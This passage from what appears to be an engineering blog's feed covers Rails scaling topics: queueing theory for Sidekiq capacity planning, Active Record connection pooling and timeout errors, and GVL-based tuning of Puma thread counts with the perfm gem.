It's the complete duration from when a job is enqueued until it finishes executing.</p></li></ol><h2>Little's law</h2><p>Little's law is a theorem in queueing theory that states that the average number of jobs in a system is equal to the average arrival rate of new jobs multiplied by the average time a job spends in the system.</p><pre><code class="language-ruby">L = λW</code></pre><p>L = Average number of jobs in the system <br>λ = Average arrival rate of new jobs <br>W = Average time a job spends in the system</p><p>For example, if jobs arrive at a rate of 10 per minute (λ), and each job takes 30 seconds (W) to complete:</p><p>Average number of jobs in system = 10 jobs/minute * 0.5 minutes = 5 jobs</p><p>This helps us understand the current state of our system and that there are 5 jobs in the system on average at any given moment.</p><p><code>L</code> is also called <strong>offered traffic</strong>.</p><p>Note: Little's Law assumes the arrival rate is consistent over time.</p><h3>Managing Utilization</h3><p>Utilization measures how busy our processing capacity is.</p><p>Mathematically, it is the ratio of how much processing capacity we're using to the processing capacity we have.</p><pre><code class="language-ruby">utilization = (average number of jobs in the system / capacity to handle jobs) * 100</code></pre><p>In other words, it could be written as follows.</p><pre><code class="language-ruby">utilization = (offered_traffic / parallelism) * 100</code></pre><p>For example, if we are using Sidekiq to manage our background jobs, then in a single-threaded case, parallelism is equal to the number of Sidekiq processes.</p><p>Let's look at a practical case with numbers:</p><ul><li>We have 30 jobs arriving every minute</li><li>It takes 0.5 minutes to process a job</li><li>We have 20 Sidekiq processes</li></ul><p>In this case, the utilization will be:</p><pre><code class="language-ruby">utilization = ((30 jobs/minute * 0.5 minutes) / 20 processes) * 100 = 75%</code></pre><h3>High 
utilization is bad for performance</h3><p>Let's assume we maintain 100% utilization in our system. It means that if, on average, we get 30 jobs per minute, then we have just enough capacity to handle 30 jobs per minute.</p><p>One day, we start getting 45 jobs per minute. Since utilization is at 100%, there is no extra room to accommodate the additional load. This leads to higher latency.</p><p>Hence, having a high utilization rate may result in low performance, as it can lead to higher latency for specific jobs.</p><h3>The knee curve</h3><p>Mathematically, it would seem that latency should spike up only when the utilization rate hits 100%. However, in the real world, it has been found that latency begins to increase dramatically when utilization reaches around 70-75%.</p><p>If we draw a graph between utilization and performance, then the graph would look something like this.</p><p><img src="/blog_images/2025/understanding-queueing-theory/knee-curve.png" alt="The knee curve"></p><p>The point at which the curve bends sharply upwards is called the &quot;knee&quot; in the performance curve. At this point, the exponential effects predicted by queueing theory become pronounced, causing the queue latency to climb quickly.</p><p>Running any system consistently above 70-75% utilization significantly increases the risk of spiking the latency, as jobs spend more and more time waiting.</p><p>This would directly impact the customer experience, as it could result in delays in sending emails or making calls to Twilio to send SMS messages, etc.</p><p>Tracking this latency will be covered in upcoming blogs. The tracking of metrics depends on the queueing backend used (Sidekiq or Solid Queue).</p><h2>Concurrency and theoretical parallelism</h2><p>In Sidekiq, a process is the primary unit of parallelism. 
However, concurrency (threads per process) significantly impacts a process's effective throughput. Because of the GVL, we need to take into account how long a job waits on I/O.</p><p>The more time a job spends waiting on external resources (like databases or APIs) rather than executing Ruby code, the more other threads within the same process can run Ruby code while the first thread waits.</p><p>We learned about Amdahl's law in <a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">Part 3</a> of this series.</p><p><img src="/blog_images/2025/understanding-queueing-theory/amdahls-law.png" alt="Amdahl's law"></p><p>Where:</p><p><code>p</code> is the portion that can be parallelized (the I/O percentage)</p><p><code>n</code> is the number of threads (concurrency)</p><p>Speedup is equivalent to theoretical parallelism in this context. In queueing theory, parallelism refers to how many units of work can be processed simultaneously. When we calculate speedup using Amdahl's Law, we're essentially determining how much faster a multi-threaded system can handle work compared to a single-threaded system.</p><p>Let's assume that a system has an I/O of 50% and a concurrency of 10. Then the speedup will be:</p><pre><code class="language-ruby">Speedup = 1 / ((1 - 0.5) + 0.5 / 10) = 1 / 0.55 = 1.82 ≈ 2</code></pre><p>This means one Sidekiq process with 10 threads will handle jobs twice as fast as a single Sidekiq process with a single thread.</p><p>Let's recap what we are saying here. We are assuming that the system has 50% I/O and is using a single Sidekiq process with 10 threads (concurrency). Because of those 10 threads, the system has a speed gain of 2x compared to a system with just a single thread. In other words, just because we have 10 threads running, we are not going to get a 10x performance improvement. 
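</p><p>The speedup arithmetic above can be captured in a few lines of Ruby (a sketch; <code>amdahl_speedup</code> is our own helper name, not a Rails or Sidekiq API):</p>

```ruby
# Amdahl's law: speedup = 1 / ((1 - p) + p / n)
# p = parallelizable portion (the I/O fraction), n = number of threads.
def amdahl_speedup(io_fraction, threads)
  1.0 / ((1.0 - io_fraction) + io_fraction / threads)
end

amdahl_speedup(0.5, 10).round(2)   # => 1.82, i.e. roughly 2x
amdahl_speedup(0.75, 16).round(2)  # => 3.37, matching the ~3x row in the table below
```

<p>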
What those 10 threads are getting us is what is called &quot;theoretical parallelism&quot;.</p><p>Similarly, for other values of I/O and concurrency, we can get the theoretical parallelism.</p><table><thead><tr><th>I/O</th><th>Concurrency</th><th>Theoretical parallelism</th></tr></thead><tbody><tr><td>5%</td><td>1</td><td>1</td></tr><tr><td>25%</td><td>5</td><td>1.25</td></tr><tr><td>50%</td><td>10</td><td>2</td></tr><tr><td>75%</td><td>16</td><td>3</td></tr><tr><td>90%</td><td>32</td><td>8</td></tr><tr><td>95%</td><td>64</td><td>16</td></tr></tbody></table><p>Let's go over it one more time. In the last example, what we are stating is that if a system has 95% I/O and 64 threads running, then that will give a 16x performance improvement over the same system running on a single thread.</p><p>Here is the graph for this data.</p><p><img src="/blog_images/2025/understanding-queueing-theory/concurrency-vs-effective-parallelism.png" alt="Theoretical Parallelism"></p><p>As shown in the graph, a Sidekiq process with 16 threads handling jobs that are 75% I/O-bound achieves a theoretical parallelism of approximately 3. In other words, there is a 3x performance improvement over a single-threaded system.</p><h2>Calculating the number of processes required</h2><p>At the beginning of this article, we discussed &quot;Little's law&quot; and noted that <code>L</code> is also called &quot;offered traffic,&quot; which depicts the &quot;average number of jobs in the system&quot;.</p><p>If &quot;offered traffic&quot; is 5, then it means we have 5 units of work arriving on average that require processing simultaneously.</p><p>We just learned that utilization greater than 75% can cause problems, as there is a risk of latency spikes.</p><p>For queues with low latency requirements (e.g. <code>urgent</code>), we need to target a lower utilization rate. 
Let's say we want utilization to be around 50% to be on the safe side.</p><p>Now we know the utilization rate that we need to target, and we know the &quot;offered traffic&quot;. So we can calculate the &quot;parallelism&quot;.</p><pre><code class="language-ruby">utilization = offered_traffic / parallelism
=&gt; 0.50 = 5 / parallelism
=&gt; parallelism = 5 / 0.50 = 10</code></pre><p>This means we need a theoretical parallelism of 10 to ensure that the utilization is at most 50%.</p><p>Let's assume the jobs in this queue have an average of <code>50%</code> I/O. Based on the above-mentioned graph, we can see that if the concurrency is 10, then we get a parallelism of 2. However, increasing the concurrency further doesn't increase the parallelism. It means that if we want a parallelism of 10, we can't just switch to a concurrency of 50. Even a concurrency of 50 (or 50 threads) will only yield a parallelism of 2.</p><p>So we have no choice but to add more processes. Since one process with a concurrency of 10 yields a parallelism of 2, we need 5 processes to get a parallelism of 10.</p><pre><code class="language-ruby">Total number of Sidekiq processes required = 10 / 2 = 5</code></pre><p><em>To get the I/O wait percentage, we can make use of perfm. <a href="https://github.com/bigbinary/perfm?tab=readme-ov-file#sidekiq-gvl-instrumentation">Here</a> is the documentation on how it can be done.</em></p><p>Here we're talking about the Sidekiq free version, where we'll only be able to run a single process per dyno. If we're using Sidekiq Pro, we can run multiple processes per dyno via Sidekiq Swarm.</p><p>We can provision 5 dynos for the urgent queue. But we should always have a queue-time-based autoscaler like Judoscale enabled to handle spikes.</p><h2>Sources of Saturation</h2><p>We discussed earlier that, in the context of queueing theory, the saturation point is typically reached at around 70-75% utilization. 
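</p><p>Before moving on, the sizing walk-through above can be condensed into a short script (a sketch using this post's numbers; the variable names are ours):</p>

```ruby
# Little's law gives the offered traffic: L = lambda * W.
offered_traffic = 10 * 0.5            # 10 jobs/minute arriving, 0.5 minutes each => 5.0

# utilization = offered_traffic / parallelism, so for a 50% target:
target_utilization = 0.5
required_parallelism = offered_traffic / target_utilization   # => 10.0

# At 50% I/O, one process with 10 threads yields ~2x parallelism (Amdahl's law).
parallelism_per_process = 2.0
processes_needed = (required_parallelism / parallelism_per_process).ceil

puts processes_needed   # prints 5
```

<p>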
This is from the point of view of further gains by adding more threads.</p><p>However, saturation can occur in other parts of the system.</p><h3>CPU</h3><p>The servers running your Sidekiq processes have finite CPU and memory. While CPU usage is a metric we can track for Sidekiq, it's generally not the only one we need to focus on for scaling decisions.</p><p>CPU utilization can be misleading. If our jobs spend most of their time doing I/O (like making API calls or database queries), CPU usage will be very low even when our Sidekiq system is at capacity.</p><h3>Memory</h3><p>Memory utilization impacts performance very differently from CPU utilization. Memory utilization generally exhibits minimal changes in latency or throughput from 0% to 100% utilization. However, beyond 100% utilization, things start to deteriorate significantly. The system will start using swap memory, which can be very slow, thereby increasing job service times.</p><h3>Redis</h3><p>Another place where saturation can occur is in our datastore, i.e., Redis in the case of Sidekiq. We have to make sure that we provision a separate Redis instance for Sidekiq and also set the eviction policy to <code>noeviction</code>. This ensures that Redis will reject new data when the memory limit is reached, resulting in an explicit failure rather than silently dropping important jobs.</p><p><em>This was Part 6 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of the blog is not clear to you, then please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding Active Record Connection Pooling]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-active-record-connection-pooling"/>
      <updated>2025-05-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-active-record-connection-pooling</id>
      <content type="html"><![CDATA[<p><em>This is Part 5 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><h2>Database Connection Pooling</h2><p>When a Rails application needs to interact with a database, it establishes a connection, which is a dedicated communication channel between the application and the database server. When a new request comes to Rails, the operation can be handled like this.</p><ol><li>Create a connection</li><li>Do the database operation</li><li>Close the connection</li></ol><p>When the next request comes, repeat the above process.</p><p>Creating new database connections is an expensive operation - it takes time to establish the connection, authenticate, and set up the communication channel. It means that every single time a request comes, we are spending time setting up the connection.</p><p>Wouldn't it be better to store the established connection somewhere and, when a new request comes, get the pre-established connection from this pool? This expedites the process since we don't need to create and close a connection on every single request.</p><p>The new process might look like this.</p><ol><li>Create a connection</li><li>Do the database operation</li><li>Put the connection in a pool</li></ol><p>Now, when a new request comes, the operation will look like this.</p><ol><li>Get a connection from the pool</li><li>Do the database operation</li><li>Return the connection to the pool</li></ol><p>Database connection pooling is a performance optimization technique that maintains a set of reusable database connections.</p><h2>Active Record Connection Pool Implementation</h2><p>Active Record manages a pool of database connections for each web and background process. Each process will have a connection pool of its own, which means a Rails application running with multiple processes (like Puma processes and Sidekiq processes) will have multiple independent connection pools. 
The pool is a set of database connections that are shared among threads in the <strong>same process</strong>.</p><p>Note that the pooling happens at the process level. A thread from process A can't get a connection from process B's pool.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/without-pg-bouncer.png" alt="Connection pooling"></p><p>When a connection is needed, the thread checks out a connection from the pool, performs operations, and then returns the connection to the pool. This is now done at a query level. For each individual query, a connection is leased, used, and then returned to the pool.</p><p>Before Rails 7.2, the connection used to be leased and held till the end of the request for a web request, and till the job was done for a background job. This was a problem for applications that spent a lot of time doing I/O. The thread would hog the connection for the entire duration of the I/O operation, limiting the number of queries that could be executed concurrently. To facilitate this change and make query caching work, the query cache has been <a href="https://github.com/rails/rails/pull/50938/">updated</a> to be owned by the pool.</p><p>This means that the query cache is now shared across all connections in the pool. Previously, each connection had its own query cache. As the whole request used the same connection, this was fine. 
But now, as the connection is leased for each query, the query cache needs to be shared across all connections in the pool.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/connection-leasing-comparison.png" alt="Connection-leasing-comparison"></p><h2>Connection Pool Configuration Options</h2><p>Active Record's connection pool behavior can be customized through several configuration options in the database.yml file:</p><ul><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-pool">pool</a>: Sets the maximum number of connections the pool will maintain. The default is tied to <code>RAILS_MAX_THREADS</code>, but you can set it to any value. There is a small problem when you set it to <code>RAILS_MAX_THREADS</code>, which we'll discuss later.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-checkout_timeout">checkout timeout</a>: Determines how long a thread will wait to get a connection before timing out. The default is 5 seconds. If all connections are in use and a thread waits longer than this value, an <code>ActiveRecord::ConnectionTimeoutError</code> exception will be raised.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-idle_timeout">idle timeout</a>: Specifies how long a connection can remain idle before it's removed from the pool. The default is 300 seconds. This helps reclaim resources from connections that aren't being used.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-reaping_frequency">reaping frequency</a>: Controls how often the Reaper (which we'll discuss shortly) runs to remove dead or idle connections. 
The default is 60 seconds.</li></ul><h2>Active Record Connection Pool Reaper</h2><p>Database connections can sometimes become &quot;dead&quot; due to issues like database restarts, network problems, etc. Active Record provides the Reaper to handle this.</p><p>The Reaper periodically checks connections in the pool and removes dead connections as well as idle connections that have been checked out for a long time.</p><p>It acts somewhat like a garbage collector for database connections. The Reaper uses the <code>idle_timeout</code> setting to determine how long a connection can remain idle before being removed, tracking idle time based on when connections were last used.</p><p>There is another configuration option called <code>reaping_frequency</code> that controls how often the Reaper runs to remove dead or idle connections from the pool. By default, this is set to 60 seconds. It means the Reaper will wake up once every minute to perform its maintenance tasks.</p><p>If your application is spiky and receives a lot of traffic in surges, then set the reaping frequency and idle timeout to lower values. This will ensure that the Reaper runs more frequently and removes idle connections more quickly, helping to keep the connection pool healthy and responsive.</p><h2>Why are idle connections bad?</h2><p>Idle database connections can significantly impact database performance for several interconnected reasons:</p><p><strong>Memory Consumption</strong>: Each database connection, even when idle, maintains its own memory allocation. The database must reserve memory for session state, buffers, user context, and transaction workspace. This memory remains allocated even when the connection isn't doing any work. 
For example, if each connection uses 10 MB of memory, 100 idle connections would unnecessarily consume 1 GB of your database's memory that could otherwise be used for active queries, caching, or other productive work.</p><p><strong>CPU overhead</strong>: While &quot;idle&quot; suggests no activity, the database still performs regular maintenance work for each connection. It must monitor connection health via keepalive checks, manage process tables, etc.</p><p>The crucial issue is that the overhead of having idle connections scales non-linearly. As we add more idle connections, the database spends an increasing proportion of its CPU time just managing these connections rather than processing actual queries. Thankfully, the Reaper handles this for us.</p><h2>How many database connections will the web and background processes utilize at maximum?</h2><p>As we learned, the connection pool is managed at the process level. Each Rails process maintains its own pool.</p><ol><li><strong>In web processes (Puma)</strong>:</li></ol><p>Each Puma process is a separate process with its own connection pool. In a process, each thread can check out one connection. Therefore, the maximum number of connections needed per process equals the <code>max_threads</code> setting in Puma.</p><ol start="2"><li><strong>In background processes (Sidekiq)</strong>:</li></ol><p>Sidekiq runs as a separate process with its own connection pool. 
The Sidekiq <code>concurrency</code> setting determines the number of threads, and therefore the maximum number of connections needed equals the <code>concurrency</code> value.</p><p><em>Note: If you're using Sidekiq Swarm and running multiple Sidekiq processes, then take that into account.</em></p><p>We can calculate the total potential connections for a typical application as shown below.</p><pre><code>Web connections = Number of web dynos * Number of Puma processes * `max_threads` value
Background connections = Number of worker dynos * Number of Sidekiq processes * Threads per process
Total number of connections = Web connections + Background connections</code></pre><p>The key thing to note here is that the database needs to support at least this many simultaneous connections.</p><p><em>Note that if preboot is enabled, then the maximum number of connections will be <strong>double</strong> the above value. This is because during the release phase, there is a small window in which both the old dynos and the new dynos are running.</em></p><p>In Rails 7, <a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Relation.html#method-i-load_async"><code>load_async</code></a> was introduced, which allows us to run database queries asynchronously in a background thread. When <code>load_async</code> is in use, the calculation for the maximum number of connections needed changes a bit. First, let's understand how <code>load_async</code> works.</p><h2>How <code>load_async</code> works</h2><p><code>load_async</code> allows Rails to execute database queries asynchronously in background threads. Unlike regular Active Record queries, which are lazily loaded, <code>load_async</code> queries are always executed immediately in background threads and joined to the main thread when results are needed.</p><p>The async executor is configured through the <code>config.active_record.async_query_executor</code> setting. 
There are three possible configurations:</p><ol><li><code>nil</code> (default): Async queries are disabled, and <code>load_async</code> will execute queries synchronously.</li><li><code>:global_thread_pool</code>: Uses a single thread pool for all database connections.</li><li><code>:multi_thread_pool</code>: Uses separate thread pools for each database connection.</li></ol><p>Rails provides a configuration option named <a href="https://guides.rubyonrails.org/configuring.html#config-active-record-global-executor-concurrency">global_executor_concurrency</a> (default: 4) that controls how many concurrent async queries can run per process. So, the maximum number of connections per process when <code>load_async</code> is used becomes:</p><pre><code class="language-ruby">Maximum connections per process = Process-level concurrency + global_executor_concurrency + 1</code></pre><p>Here, process-level concurrency means <code>max_threads</code> for a Puma process and the <code>concurrency</code> value for a Sidekiq process.</p><p>The &quot;+1&quot; accounts for the main control thread, which may occasionally need a connection (e.g., during model introspection at class load time).</p><p>There is a nice <a href="https://judoscale.com/tools/heroku-postgresql-connection-calculator">calculator</a> created by the folks at <a href="https://judoscale.com/">Judoscale</a> which can be used to calculate the maximum number of connections needed for your application.</p><h2>Setting Database Pool Size Configuration</h2><p>Our <code>database.yml</code> file has the following line.</p><pre><code class="language-yaml">pool: &lt;%= ENV.fetch(&quot;RAILS_MAX_THREADS&quot;) { 5 } %&gt;</code></pre><p>We know that a thread doesn't take more than one DB connection. So the maximum number of connections needed per pool is equal to the total number of threads. So the above configuration looks fine.</p><p>However, this doesn't take into account whether we use <code>load_async</code> or not. 
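</p><p>Putting the formula above into code (a quick sketch; <code>max_connections_per_process</code> is a hypothetical helper of ours, and the numbers are illustrative):</p>

```ruby
# Per the formula above: process-level concurrency, plus the async query
# executor threads, plus one for the main control thread.
def max_connections_per_process(thread_count, load_async: false, executor_concurrency: 4)
  return thread_count unless load_async

  thread_count + executor_concurrency + 1
end

max_connections_per_process(5)                    # RAILS_MAX_THREADS = 5, no load_async => 5
max_connections_per_process(5, load_async: true)  # => 10 (5 + 4 + 1)
```

<p>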
If we use <code>load_async</code>, then the number of connections needed per process will be <code>RAILS_MAX_THREADS + global_executor_concurrency + 1</code>.</p><p>Do we really need to go into this much detail to determine the pool size? Turns out there is a much easier answer.</p><p>Almost all database hosting providers mention the maximum number of connections allowed in their plan. We can just set the pool config to the maximum number of connections supported by our database plan. Let us say we have a Standard-0 database on Heroku. It supports up to 120 connections. So we can set the pool config to 120.</p><pre><code class="language-yaml">pool: 120</code></pre><p>We can do this because the database connections are lazily initialized in the pool. The application doesn't create more database connections than it needs. So we needn't be conservative here.</p><p>The only thing we need to ensure is that the maximum connection utilization doesn't exceed the database plan limit. If that happens, then we have another solution - PgBouncer.</p><h2>PgBouncer</h2><p>PgBouncer is a lightweight connection pooler for PostgreSQL. It sits between our application(s) and our PostgreSQL database and manages a pool of database connections.</p><p>While both PgBouncer and Active Record provide connection pooling, they operate at different levels and serve different purposes.</p><p>The Active Record connection pool operates within a single Ruby process and manages connections for threads within the process, whereas PgBouncer is an external connection pooler that sits between the application and the database and manages connections across all the application processes.<img src="/blog_images/2025/understanding-active-record-connection-pooling/with-pg-bouncer.png" alt="With PgBouncer"></p><h2>The dreaded ActiveRecord::ConnectionTimeoutError</h2><p>This error comes up when a thread waits more than <code>checkout_timeout</code> seconds to acquire a connection. 
This usually happens when the <code>pool</code> size is set to a value less than the concurrency.</p><p>For example, let's say we have set the Sidekiq concurrency to 10 and the pool size to 5. If we have more than 5 threads wanting a connection at any point in time, the threads will have to wait.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/threads-waiting-for-connection.png" alt="Connection pooling"></p><p>What's the solution? As we discussed earlier, setting the <code>pool</code> to a really high value should fix the error in most cases.</p><p>Even after setting the config correctly, <code>ActiveRecord::ConnectionTimeoutError</code> can still happen, and it could be puzzling. Let us discuss a few scenarios where this can happen.</p><h2>Custom code spinning up new threads and taking up connections</h2><pre><code class="language-ruby">class SomeService
  def process
    threads = []

    5.times do
      threads &lt;&lt; Thread.new do
        ActiveRecord::Base.connection.execute(&quot;select pg_sleep(5);&quot;)
      end
    end

    threads.each(&amp;:join)
  end
end</code></pre><p>Here, 5 threads are spun up. Note that these threads also take up connections from the same pool allotted to the process.</p><h3>Active Storage proxy mode</h3><p>Even if our application code is not spinning up new threads, Rails itself can sometimes spin up additional threads. 
For example, consider Active Storage configured in <a href="https://edgeguides.rubyonrails.org/active_storage_overview.html#proxy-mode">proxy mode</a>.</p><p>Active Storage's proxy controllers (<a href="https://github.com/rails/rails/blob/b97a7625970c74f2273211ccb17046049f409110/activestorage/app/controllers/active_storage/blobs/proxy_controller.rb">1</a>, <a href="https://github.com/rails/rails/blob/b97a7625970c74f2273211ccb17046049f409110/activestorage/app/controllers/active_storage/representations/proxy_controller.rb">2</a>) generate responses as streams, which require dedicated threads for processing.</p><p>This means that when serving an Active Storage file through one of these proxy controllers, Rails actually utilizes two separate threads - one for the main request and another for the streaming process. Each of these threads requires its own separate database connection from the Active Record connection pool.</p><h3>Rack timeouts</h3><p><a href="https://github.com/zombocom/rack-timeout">rack-timeout</a> is commonly used across Rails applications to automatically terminate long-running requests. While it helps prevent server resources from being tied up by slow requests, it can also cause a few issues.</p><p>rack-timeout uses Ruby's <a href="https://rubyapi.org/3.4/o/thread#method-i-raise">Thread#raise</a> API to terminate requests that exceed the configured timeout. When a timeout occurs, rack-timeout raises a <code>Rack::Timeout::RequestTimeoutException</code> from another thread. If this exception is raised while a thread is in the middle of database operations, it can prevent proper cleanup of database connections.</p><h2>Tracking down ActiveRecord::ConnectionTimeoutErrors</h2><p>If we still frequently see <code>ActiveRecord::ConnectionTimeoutError</code> exceptions in our application, we can get additional context by logging the connection pool info to our error monitoring service.
This can help identify which threads were holding onto the connections when the error occurred.</p><pre><code class="language-ruby">config.before_notify do |notice|
  if notice.error_class == &quot;ActiveRecord::ConnectionTimeoutError&quot;
    notice.context = { connection_pool_info: detailed_connection_pool_info }
  end
end

def detailed_connection_pool_info
  connection_info = {}
  ActiveRecord::Base.connection_pool.connections.each_with_index do |conn, index|
    connection_info[&quot;connection_#{index + 1}&quot;] = conn.owner ? conn.owner.inspect : &quot;[UNUSED]&quot;
  end
  connection_info[&quot;current_thread&quot;] = Thread.current.inspect
  connection_info
end</code></pre><p><code>&lt;thread_obj&gt;.inspect</code> gives us the name, ID and status of the thread. For example, if one entry in the hash looks like <code>#&lt;Thread:0x00006a42eca73ba0@puma srv tp 002 /app/.../gems/puma-6.2.2/lib/puma/thread_pool.rb:106 sleep_forever&gt;</code>, then it means that the connection is taken up by a Puma thread.</p><h2>Monitoring Active Record Connection Pool Stats</h2><p>If we want to monitor Active Record connection pool stats, we need to periodically send the stats to a service which can display the data graphically. To run the check periodically, we are using the <a href="https://github.com/jmettraux/rufus-scheduler">rufus-scheduler</a> gem. For collecting and displaying the data we are using New Relic, but you can use any APM of your choice. We have configured it to send the pool stats every 15 seconds.</p><p><a href="https://gist.github.com/vishnu-m/8cfae21cac385aa07819c8805e491872">Here</a> is the gist which collects and sends the data.</p><p><em>This was Part 5 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>.
If any part of the blog is not clear to you, then please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or via the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Finding ideal number of threads per process using GVL instrumentation]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation"/>
      <updated>2025-05-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation</id>
      <content type="html"><![CDATA[<p><em>This is Part 4 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>we saw how to find ideal number of processes for our Rails application.</p><p>In<a href="https://bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">part 3</a>,we learned about Amdahl's law, which helps us find the ideal number of threadstheoretically.</p><p>In this blog, we'll run a bunch of tests on our real production application tosee what the actual number of threads should be for each process.</p><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>we discussed the presence of GVL and the concept of thread switching. Based onthe GVL's interaction, a thread can be in one of these three states.</p><ol><li><strong>Running</strong>: The thread has the GVL and is executing Ruby code.</li><li><strong>Idle</strong>: The thread doesn't want the GVL because it is performing I/Ooperations.</li><li><strong>Stalled</strong>: The thread wants the GVL and is waiting for it in the GVL waitqueue.</li></ol><p><img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/thread-states.png" alt="Thread states"></p><p>Based on the above diagram, we can approximately equate <code>idle time</code> to<code>I/O time</code>.</p><h2>GVL instrumentation using perfm</h2><p>Thanks to Jean Boussier's work on the<a href="https://bugs.ruby-lang.org/issues/18339">GVL instrumentation API</a> and JohnHawthorn's work on <a href="https://github.com/jhawthorn/gvl_timing">gvl_timing</a>, we cannow measure the time a thread spends in each of these states for apps running onRuby 3.2 or higher.</p><p>Using the great work done by these folks, we have created<a 
href="https://github.com/bigbinary/perfm">perfm</a>, to help us figure out the idealnumber of Puma threads based on the application's workload.</p><p>Perfm inserts a Rack middleware to our Rails application. This middlewareinstruments the GVL, collects the required metrics and stores them in a table.It also has a <code>Perfm::GvlMetricsAnalyzer</code> class which can be used to generate areport on the data collected.</p><h3>Using perfm to measure the application's I/O percentage</h3><p>To use perfm, we need to add the following line to our Gemfile.</p><pre><code class="language-ruby">gem 'perfm'</code></pre><p>We'll run <code>bin/rails generate perfm:install</code>. This will generate the migrationto create <code>perfm_gvl_metrics</code> which will be used to store request-level metrics.</p><p>Now we'll create an initializer <code>config/initializers/perfm.rb</code>.</p><pre><code class="language-ruby">Perfm.configure do |config|  config.enabled = true  config.monitor_gvl = true  config.storage = :localendPerfm.setup!</code></pre><p>After deploying the code to production, we need to collect around 20K requestsas that will give us a fair number of data points to analyze. The GVL monitoringcan be disabled after that by setting <code>config.monitor_gvl</code> to <code>false</code> so thatthe table doesn't keep growing.</p><p>After collecting the request data, now it's time to analyze it.</p><p>Run the following code in the Rails console.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago, # configure thisirb(main):003*   end_time: Time.currentirb(main):004&gt; )irb(main):005&gt;irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; io_percentage = results[:summary][:total_io_percentage]=&gt; 45.09</code></pre><p>This will give us the percentage of time spent doing I/O. 
We ran it in our <a href="https://neeto.com/cal">NeetoCal</a> production application and we got a value of 45%.</p><p>As we discussed in <a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">part 3</a>, Amdahl's law gives us the theoretical maximum speedup based on the parallelizable portion of our workload. The formula is given below.<img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/amdahls-law.png" alt="Amdahl's law formula"></p><p>Where:</p><ul><li><code>p</code> is the portion that can be parallelized (in our case, it's 0.45)</li><li><code>N</code> is the number of threads</li><li><code>(1 - p)</code> is the portion that must run sequentially (in our case, it's 0.55)</li></ul><p>Let's calculate the theoretical speedup for different numbers of threads with p = 0.45:</p><table><thead><tr><th>Thread Count (N)</th><th>Speedup</th><th>% Improvement from previous run</th></tr></thead><tbody><tr><td>1</td><td>1.00</td><td>-</td></tr><tr><td>2</td><td>1.29</td><td>29%</td></tr><tr><td>3</td><td>1.43</td><td>11%</td></tr><tr><td>4</td><td>1.52</td><td>6%</td></tr><tr><td>5</td><td>1.57</td><td>3%</td></tr><tr><td>6</td><td>1.60</td><td>2%</td></tr><tr><td>8</td><td>1.64</td><td>&lt;2%</td></tr><tr><td>16</td><td>1.69</td><td>&lt;1%</td></tr><tr><td>∞</td><td>1.82</td><td>-</td></tr></tbody></table><p>We can see that after 4 threads, the percentage improvement drops below 5%. This means that 4 is a reasonable value for <code>max_threads</code>.
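The table above can be reproduced with a few lines of Ruby; `speedup` below is just Amdahl's formula applied to our measured p = 0.45 (small differences from the table come from rounding):

```ruby
# Amdahl's law: S(N) = 1 / ((1 - p) + p / N)
# p is the parallelizable (I/O) fraction; N is the number of threads.
def speedup(p, n)
  1.0 / ((1 - p) + p / n.to_f)
end

p_io = 0.45
[1, 2, 3, 4, 5, 6, 8, 16].each do |n|
  printf("%2d threads => %.2fx\n", n, speedup(p_io, n))
end

# As N grows without bound, the speedup approaches 1 / (1 - p) = 1 / 0.55, about 1.82x.
```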
